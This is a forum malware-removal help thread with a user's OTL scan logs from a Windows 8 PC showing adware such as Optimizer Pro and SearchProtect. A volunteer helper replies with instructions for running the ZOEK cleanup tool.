[2014/05/04 16:50:15 | 000,000,000 | ---D | C] -- C:\rei
[2014/05/04 16:50:09 | 000,000,000 | ---D | C] -- C:\ProgramData\AVAST Software
[2014/05/04 16:50:05 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SoftwareWatcher bundle
[2014/05/04 16:49:55 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Optimizer Pro v3.2
[2014/05/04 16:49:25 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Optimizer Pro
[2014/05/04 16:47:57 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\sweetpacks bundle uninstaller
[2014/05/04 16:45:29 | 000,000,000 | ---D | C] -- C:\ProgramData\Internet Helper Anti-phishing
[2014/05/04 16:45:10 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\MyPC Backup
[2014/05/04 16:44:36 | 000,000,000 | ---D | C] -- C:\ProgramData\Mozilla
[2014/05/04 16:44:30 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\SuperFastPC
[2014/05/04 16:43:37 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\SearchProtect
[2014/05/04 16:36:02 | 000,000,000 | ---D | C] -- C:\ProgramData\Synaptics
[2014/05/04 16:35:57 | 000,000,000 | R--D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Shopping and Services
[2014/05/04 16:32:39 | 000,000,000 | ---D | C] -- C:\Windows\SoftwareDistribution
 
========== Files - Modified Within 30 Days ==========
 
[2014/06/02 13:23:00 | 000,000,830 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2014/06/02 13:20:00 | 000,000,902 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2014/06/02 12:45:56 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2014/06/02 09:20:04 | 000,002,210 | ---- | M] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2014/06/02 09:20:02 | 000,000,898 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2014/06/02 07:46:12 | 000,000,354 | ---- | M] () -- C:\Windows\tasks\HPCeeScheduleForpaulj_000.job
[2014/06/02 07:45:58 | 268,435,456 | -HS- | M] () -- C:\swapfile.sys
[2014/06/02 07:45:54 | 3349,221,376 | -HS- | M] () -- C:\hiberfil.sys
[2014/06/01 22:19:09 | 000,007,456 | ---- | M] () -- C:\Windows\SysNative\SettingsFile
[2014/06/01 21:49:02 | 000,001,170 | ---- | M] () -- C:\Users\Public\Desktop\Mozilla Firefox.lnk
[2014/05/31 22:30:46 | 000,000,338 | ---- | M] () -- C:\Windows\tasks\HPCeeScheduleForSarah.job
[2014/05/29 22:12:02 | 000,243,371 | ---- | M] () -- C:\Windows\SysNative\ScanResults.xml
[2014/05/22 17:14:44 | 000,956,476 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
[2014/05/22 17:14:44 | 000,800,408 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
[2014/05/22 17:14:44 | 000,165,436 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2014/05/21 16:42:53 | 000,335,896 | ---- | M] () -- C:\Windows\SysNative\FNTCACHE.DAT
[2014/05/19 21:41:53 | 000,002,252 | -H-- | M] () -- C:\Users\paulj_000\Documents\Default.rdp
[2014/05/19 16:58:07 | 001,039,096 | ---- | M] (AVAST Software) -- C:\Windows\SysNative\drivers\aswsnx.sys
[2014/05/19 16:58:06 | 000,423,240 | ---- | M] (AVAST Software) -- C:\Windows\SysNative\drivers\aswsp.sys
[2014/05/19 16:58:06 | 000,085,328 | ---- | M] (AVAST Software) -- C:\Windows\SysNative\drivers\aswstm.sys
[2014/05/10 08:40:36 | 000,000,870 | ---- | M] () -- C:\Users\paulj_000\Desktop\µTorrent.lnk
[2014/05/06 14:02:58 | 000,000,426 | ---- | M] () -- C:\AVScanner.ini
[2014/05/06 13:53:48 | 000,000,000 | -H-- | M] () -- C:\Windows\SysNative\drivers\Msft_User_LocationProvider_01_11_00.Wdf
[2014/05/05 19:34:54 | 000,000,536 | ---- | M] () -- C:\Windows\SysWow64\schtasks.bin
[2014/05/04 17:34:28 | 000,001,093 | ---- | M] () -- C:\Users\Public\Desktop\VLC media player.lnk
[2014/05/04 16:58:36 | 000,001,989 | ---- | M] () -- C:\Users\Public\Desktop\avast! Free Antivirus.lnk
[2014/05/04 16:54:22 | 001,039,096 | ---- | M] (AVAST Software) -- C:\Windows\SysNative\drivers\aswsnx.sys.1400515085015
[2014/05/04 16:54:22 | 000,423,240 | ---- | M] (AVAST Software) -- C:\Windows\SysNative\drivers\aswsp.sys.1400515085015
[2014/05/04 16:54:22 | 000,334,648 | ---- | M] (AVAST Software) -- C:\Windows\SysNative\aswBoot.exe
[2014/05/04 16:54:22 | 000,208,416 | ---- | M] () -- C:\Windows\SysNative\drivers\aswVmm.sys
[2014/05/04 16:54:22 | 000,079,184 | ---- | M] (AVAST Software) -- C:\Windows\SysNative\drivers\aswMonFlt.sys
[2014/05/04 16:54:22 | 000,065,776 | ---- | M] () -- C:\Windows\SysNative\drivers\aswRvrt.sys
[2014/05/04 16:54:22 | 000,029,208 | ---- | M] () -- C:\Windows\SysNative\drivers\aswHwid.sys
[2014/05/04 16:54:20 | 000,093,568 | ---- | M] (AVAST Software) -- C:\Windows\SysNative\drivers\aswRdr2.sys
[2014/05/04 16:54:16 | 000,043,152 | ---- | M] (AVAST Software) -- C:\Windows\avastSS.scr
[2014/05/04 16:53:28 | 000,000,163 | ---- | M] () -- C:\Windows\Reimage.ini
[2014/05/04 16:51:05 | 000,001,924 | ---- | M] () -- C:\Users\Public\Desktop\PC Scan & Repair by Reimage.lnk
[2014/05/04 16:36:04 | 000,002,155 | ---- | M] () -- C:\Users\Public\Desktop\WildTangent Games for HP.lnk
 
========== Files Created - No Company Name ==========
 
[2014/06/01 21:49:02 | 000,001,170 | ---- | C] () -- C:\Users\Public\Desktop\Mozilla Firefox.lnk
[2014/06/01 21:49:01 | 000,001,182 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
[2014/06/01 19:37:07 | 000,000,354 | ---- | C] () -- C:\Windows\tasks\HPCeeScheduleForpaulj_000.job
[2014/06/01 09:02:38 | 000,000,426 | ---- | C] () -- C:\AVScanner.ini
[2014/05/25 20:07:25 | 000,243,371 | ---- | C] () -- C:\Windows\SysNative\ScanResults.xml
[2014/05/25 19:55:28 | 000,007,456 | ---- | C] () -- C:\Windows\SysNative\SettingsFile
[2014/05/19 18:23:52 | 000,002,252 | -H-- | C] () -- C:\Users\paulj_000\Documents\Default.rdp
[2014/05/18 09:12:56 | 000,387,210 | ---- | C] () -- C:\Windows\SysNative\ApnDatabase.xml
[2014/05/18 09:02:52 | 000,139,600 | ---- | C] () -- C:\Windows\SysNative\systemsf.ebd
[2014/05/18 08:58:08 | 000,262,335 | ---- | C] () -- C:\Windows\SysNative\dfpinc.dat
[2014/05/18 08:54:14 | 000,002,255 | ---- | C] () -- C:\Windows\SysWow64\WimBootCompress.ini
[2014/05/18 08:54:14 | 000,002,255 | ---- | C] () -- C:\Windows\SysNative\WimBootCompress.ini
[2014/05/18 08:52:45 | 000,100,197 | ---- | C] () -- C:\Windows\SysWow64\RacRules.xml
[2014/05/18 08:52:45 | 000,100,197 | ---- | C] () -- C:\Windows\SysNative\RacRules.xml
[2014/05/18 08:52:43 | 000,007,762 | ---- | C] () -- C:\Windows\SysWow64\connectedsearch-suggestions.searchconnector-ms
[2014/05/18 08:52:43 | 000,007,762 | ---- | C] () -- C:\Windows\SysNative\connectedsearch-suggestions.searchconnector-ms
[2014/05/18 08:52:43 | 000,007,130 | ---- | C] () -- C:\Windows\SysWow64\connectedsearch-zeroinput.searchconnector-ms
[2014/05/18 08:52:43 | 000,007,130 | ---- | C] () -- C:\Windows\SysNative\connectedsearch-zeroinput.searchconnector-ms
[2014/05/18 08:52:14 | 000,011,109 | ---- | C] () -- C:\Windows\SysWow64\connectedsearch-results.searchconnector-ms
[2014/05/18 08:52:14 | 000,011,109 | ---- | C] () -- C:\Windows\SysNative\connectedsearch-results.searchconnector-ms
[2014/05/18 08:52:08 | 000,050,053 | ---- | C] () -- C:\Windows\SysNative\srms.dat
[2014/05/18 08:52:02 | 000,002,440 | R-S- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FileManager.lnk
[2014/05/10 08:40:36 | 000,000,870 | ---- | C] () -- C:\Users\paulj_000\Desktop\µTorrent.lnk
[2014/05/09 20:04:10 | 000,000,338 | ---- | C] () -- C:\Windows\tasks\HPCeeScheduleForSarah.job
[2014/05/06 17:12:48 | 000,138,240 | ---- | C] () -- C:\Windows\SysNative\OEMLicense.dll
[2014/05/06 17:12:48 | 000,103,936 | ---- | C] () -- C:\Windows\SysWow64\OEMLicense.dll
[2014/05/06 13:56:03 | 000,001,453 | ---- | C] () -- C:\Users\paulj_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
[2014/05/06 13:53:48 | 000,000,000 | -H-- | C] () -- C:\Windows\SysNative\drivers\Msft_User_LocationProvider_01_11_00.Wdf
[2014/05/05 10:46:46 | 000,000,830 | ---- | C] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2014/05/05 08:29:09 | 000,000,536 | ---- | C] () -- C:\Windows\SysWow64\schtasks.bin
[2014/05/04 17:34:28 | 000,001,093 | ---- | C] () -- C:\Users\Public\Desktop\VLC media player.lnk
[2014/05/04 16:58:36 | 000,001,989 | ---- | C] () -- C:\Users\Public\Desktop\avast! Free Antivirus.lnk
[2014/05/04 16:57:12 | 000,002,210 | ---- | C] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2014/05/04 16:56:12 | 000,000,902 | ---- | C] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2014/05/04 16:56:11 | 000,000,898 | ---- | C] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2014/05/04 16:55:37 | 000,208,416 | ---- | C] () -- C:\Windows\SysNative\drivers\aswVmm.sys
[2014/05/04 16:55:36 | 000,065,776 | ---- | C] () -- C:\Windows\SysNative\drivers\aswRvrt.sys
[2014/05/04 16:55:36 | 000,029,208 | ---- | C] () -- C:\Windows\SysNative\drivers\aswHwid.sys
[2014/05/04 16:51:05 | 000,001,924 | ---- | C] () -- C:\Users\Public\Desktop\PC Scan & Repair by Reimage.lnk
[2014/05/04 16:49:19 | 000,000,163 | ---- | C] () -- C:\Windows\Reimage.ini
[2014/05/04 16:36:03 | 000,002,155 | ---- | C] () -- C:\Users\Public\Desktop\WildTangent Games for HP.lnk
[2014/05/04 16:35:57 | 000,002,242 | ---- | C] () -- C:\Users\Public\Desktop\Visit eBay.co.uk.lnk
[2014/05/04 16:35:57 | 000,002,241 | ---- | C] () -- C:\Users\Public\Desktop\Snapfish Photos.lnk
[2013/10/25 20:49:08 | 000,303,104 | ---- | C] () -- C:\Windows\SysWow64\igdmd32.dll
[2013/10/25 20:49:04 | 000,180,736 | ---- | C] () -- C:\Windows\SysWow64\igdde32.dll
[2013/10/25 20:49:04 | 000,142,848 | ---- | C] () -- C:\Windows\SysWow64\igdail32.dll
[2013/08/26 07:13:37 | 000,931,872 | ---- | C] () -- C:\Windows\SysWow64\PerfStringBackup.INI
[2013/08/22 16:36:43 | 000,215,943 | ---- | C] () -- C:\Windows\SysWow64\dssec.dat
[2013/08/22 16:36:42 | 000,000,741 | ---- | C] () -- C:\Windows\SysWow64\NOISE.DAT
[2013/08/22 15:46:23 | 000,067,584 | --S- | C] () -- C:\Windows\bootstat.dat
[2013/08/22 08:01:23 | 000,043,131 | ---- | C] () -- C:\Windows\mib.bin
[2013/08/22 04:32:36 | 000,046,080 | ---- | C] () -- C:\Windows\SysWow64\BWContextHandler.dll
[2013/08/22 00:55:20 | 000,364,544 | ---- | C] () -- C:\Windows\SysWow64\msjetoledb40.dll
[2013/08/22 00:52:39 | 000,673,088 | ---- | C] () -- C:\Windows\SysWow64\mlang.dat
[2013/07/01 20:44:46 | 000,001,536 | ---- | C] () -- C:\Windows\SysWow64\IusEventLog.dll
 
========== ZeroAccess Check ==========
 
[2013/11/12 19:34:14 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2014/03/27 10:12:37 | 021,225,584 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2014/03/27 08:48:28 | 018,679,728 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2013/08/22 10:49:49 | 000,921,088 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2013/08/22 03:45:10 | 000,691,712 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2013/08/22 10:45:17 | 000,483,840 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
 
========== LOP Check ==========
 
[2014/05/06 13:59:42 | 000,000,000 | ---D | M] -- C:\Users\paulj_000\AppData\Roaming\AVAST Software
[2014/06/02 14:03:15 | 000,000,000 | ---D | M] -- C:\Users\paulj_000\AppData\Roaming\ClassicShell
[2014/05/10 08:40:59 | 000,000,000 | ---D | M] -- C:\Users\paulj_000\AppData\Roaming\Search Protection
[2014/05/06 13:56:14 | 000,000,000 | ---D | M] -- C:\Users\paulj_000\AppData\Roaming\Synaptics
[2014/05/31 16:02:46 | 000,000,000 | ---D | M] -- C:\Users\paulj_000\AppData\Roaming\uTorrent
 
========== Purity Check ==========
 
 
 
========== Alternate Data Streams ==========
 
@Alternate Data Stream - 220 bytes -> C:\Users\paulj_000\SkyDrive:ms-properties

< End of report >
 


Edited by peejaygee, 02 June 2014 - 09:08 AM.

  • 0

Advertisements


#2
Naathim

Naathim

    GeekU Minion

  • Expert
  • 4,568 posts

Greetings! welcome.gif
 
My name's Naathim, I'm a GeekU Minion and I'm pleased to meet you!
Now that we are mates and will be working together to clean your machine out of any junkware, feel free to call me Naat :)
I know that it is quite frustrating to have a corrupted machine because I was once in your shoes. Don't worry! Maybe I'm not a super-human, I don't know everything nor I am limitless, but I promise to do my best to fix your issues!
 
Here are some notes that should make our work faster and easier, please take a look and stay familiar with them :happy:
 
 

icon_exclaim.gif

 
icon_arrow.gif Malware removal is a long-time process due to tough analysis and research. Stay with me until I say we're done.
icon_arrow.gif Read my instructions completely before proceeding and always run the tools in the order given!
icon_arrow.gifDon't try to fix anything on your own or run any other tools. They may interfere what may lead to prevent your System from the next boot-up.
icon_arrow.gif To make my work easier post the logs directly in your replies, unless asked to attach them.
 
 

icon_question.gif

 
icon_idea.gifIf any unexpected problem will appear, interrupt processing and return here with a note!
icon_idea.gifNever be afraid to ask if in doubt!
 
Now that we have formalities out of the way, let's get started! :rockon:

 

 

 

First I'd like to apologize for the delay. As you can see this forum is quite busy lately.

 

Since there is three days from your last reply, and if you still need help, please post back with the following:

 

 

Navigate to the C:\Users\paulj_000\Downloads folder and search there for a file named Extras.txt. Post it in your reply for my review.

 

 

 

= = = = = = = = = = = = = = = = = = =

 

 

 

After that we'll run ZOEK.

Please download ZOEK by Smeenk and save it to your desktop (preferred version is the *.exe one)
Please also download the attached scriptfile, named zoekscript.txt.

Attached File  zoekscript.txt   254bytes   117 downloads

icon_idea.gif Disable your AntiVirus and AntiSpyware programs, so they do not interfere with the running of Zoek.exe. You can find instructions how to disable your security applications here.

Now, on your Desktop, drag and drop zoekscript.txt on Zoek.exe as shown below:

51dd31d8563a6-output_TD9fmK.gif

Please approve any UAC prompt to allow this action to proceed.

Answer Yes to the following prompt to allow the zoek script to run:


zoek-script-warning.jpg

This action causes Zoek.exe to start automatically. Please be patient while Zoek is scanning.

When the tool finishes, the zoek-results.log is opened in Notepad.
The log is also found on the systemdrive, normally C:\
If a reboot is needed, the log is opened after the reboot.

Please post the zoek-results.log in your reply.

 

 

 

= = = = = = = = = = = = = = = = = = =

 

 

 

Now in your next reply please include the following:

icon_idea.gif extras.txt

icon_idea.gif zoek-results.log

 

I don't mind multiple posts if necessary.

Cheers,
Naat :)


  • 0

#3
peejaygee

peejaygee

    Member

  • Topic Starter
  • Member
  • PipPip
  • 39 posts

Hi Naat. Thanks for your response.

 

 

OTL Extras logfile created on: 02/06/2014 13:53:05 - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\paulj_000\Downloads
64bit- An unknown product  (Version = 6.2.9200) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17031)
Locale: 00000809 | Country: United Kingdom | Language: ENG | Date Format: dd/MM/yyyy
 
3.90 Gb Total Physical Memory | 2.88 Gb Available Physical Memory | 73.96% Memory free
4.59 Gb Paging File | 3.48 Gb Available in Paging File | 75.89% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 914.79 Gb Total Space | 851.27 Gb Free Space | 93.06% Space Free | Partition Type: NTFS
Drive D: | 15.94 Gb Total Space | 1.58 Gb Free Space | 9.90% Space Free | Partition Type: NTFS
 
Computer Name: PC | User Name: paulj_000 | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Quick Scan | Include 64bit Scans
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
 
========== Extra Registry (SafeList) ==========
 
 
========== File Associations ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.html[@ = htmlfile] -- C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
.url[@ = InternetShortcut] -- C:\Windows\SysNative\rundll32.exe (Microsoft Corporation)
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- C:\Windows\SysWow64\control.exe (Microsoft Corporation)
.html [@ = htmlfile] -- C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
 
========== Shell Spawning ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [edit] -- Reg Error: Key error.
htmlfile [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [opennew] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [print] -- "%systemroot%\system32\rundll32.exe" "%systemroot%\system32\mshtml.dll",PrintHTML "%1"
http [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
https [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
InternetShortcut [open] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l (Microsoft Corporation)
InternetShortcut [print] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\OpenWith.exe "%1" (Microsoft Corporation)
Directory [AddToPlaylistVLC] -- "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file --playlist-enqueue "%1" (VideoLAN)
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Directory [PlayWithVLC] -- "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file --no-playlist-enqueue "%1" (VideoLAN)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- "C:\Program Files\Internet Explorer\iexplore.exe" (Microsoft Corporation)
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [edit] -- Reg Error: Key error.
htmlfile [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [opennew] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [print] -- "%systemroot%\system32\rundll32.exe" "%systemroot%\system32\mshtml.dll",PrintHTML "%1"
http [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
https [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\OpenWith.exe "%1" (Microsoft Corporation)
Directory [AddToPlaylistVLC] -- "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file --playlist-enqueue "%1" (VideoLAN)
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Directory [PlayWithVLC] -- "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file --no-playlist-enqueue "%1" (VideoLAN)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- Reg Error: Value error.
 
========== Security Center Settings ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"cval" = 1
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
"VistaSp1" = AC 1C AE C5 46 9F CE 01  [binary data]
"AntiVirusOverride" = 0
"AntiSpywareOverride" = 0
"FirewallOverride" = 0
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Upgrade]
"UpgradeTime" =  [binary data]
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Vol]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Upgrade]
"UpgradeTime" = Reg Error: Unknown registry data type -- File not found
 
========== Firewall Settings ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
 
========== Authorized Applications List ==========
 
 
========== Vista Active Open Ports Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{B5C8BE27-8963-4087-A116-7AF3942AD109}" = lport=1900 | protocol=17 | dir=in | name=windows live communications platform (ssdp) |
"{F90C4AB3-8D7F-4A34-B96A-D847378BACAE}" = lport=2869 | protocol=6 | dir=in | name=windows live communications platform (upnp) |
 
========== Vista Active Application Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{02757F16-4ACE-43D3-8281-7B1F782DAF14}" = dir=out | name=getting started with windows 8 |
"{06B62E5B-C72C-4426-A49C-833B200BD6B7}" = dir=out | name=hp registration |
"{07E47872-3137-4E5A-AF1A-4DF4018DE07F}" = dir=out | [email protected]{microsoft.windowscommunicationsapps_17.5.9600.20498_x64__8wekyb3d8bbwe?ms-resource://microsoft.windowscommunicationsapps/resources/communicationspackagename} |
"{0B9A67CE-E4CF-4A6F-93E2-12339F9AABC1}" = dir=in | app=c:\program files (x86)\hpconnectedmusic\hpconnectedmusic.exe |
"{0D7088F5-C234-4998-B223-453192B745E4}" = dir=in | app=%localappdata%\hpconnectedmusic\application\hpconnectedmusic.exe |
"{10ED4193-A4E8-47A4-8D2B-F265D34E94FB}" = dir=out | [email protected]{microsoft.bingnews_3.0.2.261_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingnews/resources/brandedapptitle} |
"{114AE117-B8EF-467A-82AF-339CD496AB0F}" = dir=out | [email protected]{microsoft.xboxlivegames_2.0.139.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.xboxlivegames/resources/34150} |
"{160387A0-D255-4550-830D-AE1B3B4DA7E5}" = protocol=6 | dir=in | app=c:\program files (x86)\bonjour\mdnsresponder.exe |
"{1A3ECE88-6089-40E7-94C6-191C81702834}" = dir=out | name=box |
"{1C337ADB-1C7C-4FFC-911F-CD97CA8FD9F1}" = dir=out | [email protected]{microsoft.bingfinance_3.0.2.258_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingfinance/resources/brandedapptitle} |
"{1F0F24F2-E706-4078-BA36-FEDF57F27589}" = dir=out | name=skype |
"{20D2CB16-11B1-471E-9857-B5F5DD006760}" = dir=out | [email protected]{microsoft.windowsreadinglist_6.3.9654.20349_x64__8wekyb3d8bbwe?ms-resource://microsoft.windowsreadinglist/resources/apppackagename} |
"{23695258-6A4F-41A4-ADDC-2CB3E51127B6}" = dir=in | name=box |
"{2BA6F6DB-5B1D-44FF-9F2E-285BC3DA5F70}" = dir=out | [email protected]{microsoft.bingtravel_3.0.2.258_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingtravel/resources/brandedapptitle} |
"{2BA73BD0-0173-48C4-8AB9-18AAA87E86CF}" = dir=out | [email protected]{microsoft.binghealthandfitness_3.0.2.258_x64__8wekyb3d8bbwe?ms-resource://microsoft.binghealthandfitness/resources/apptitle} |
"{2C5F026E-BB20-4A08-B726-90901534CFE6}" = dir=out | name=mcafee® central for hp |
"{3059DD11-EDB5-4C59-AF05-2562756ACD6D}" = dir=in | name=box |
"{311C8C35-5661-4269-A901-F68DA5426263}" = dir=in | app=c:\program files (x86)\cyberlink\powerdvd12\kernel\dms\clmsserverpdvd12.exe |
"{342FF094-12C2-46E7-BB3B-E99E27F39E72}" = protocol=6 | dir=in | app=c:\program files\common files\mcafee\platform\mcsvchost\mcsvhost.exe |
"{362FED43-3D94-4513-9EAC-3A34D06704F1}" = dir=out | [email protected]{microsoft.binghealthandfitness_3.0.2.258_x64__8wekyb3d8bbwe?ms-resource://microsoft.binghealthandfitness/resources/apptitle} |
